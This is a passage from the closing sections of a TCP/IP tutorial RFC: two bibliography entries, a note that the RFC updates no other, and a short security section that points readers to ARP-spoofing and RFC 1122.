   [2] Feinler, E., et al., "DDN Protocol Handbook", Volume 2 and 3, DDN
       Network Information Center, SRI International, 333 Ravenswood
       Avenue, Room EJ291, Menlo Park, California, U.S.A., 1985.

   [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
       Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.

11.  Relation to other RFCs

   This RFC is a tutorial and it does not UPDATE or OBSOLETE any other
   RFC.

12.  Security Considerations

   There are security considerations within the TCP/IP protocol suite.
   To some people these considerations are serious problems; to others
   they are not.  It depends on the user requirements.
   This tutorial does not discuss these issues, but if you want to learn
   more you should start with the topic of ARP-spoofing, then use the
   "Security Considerations" section of RFC 1122 to lead you to more
   information.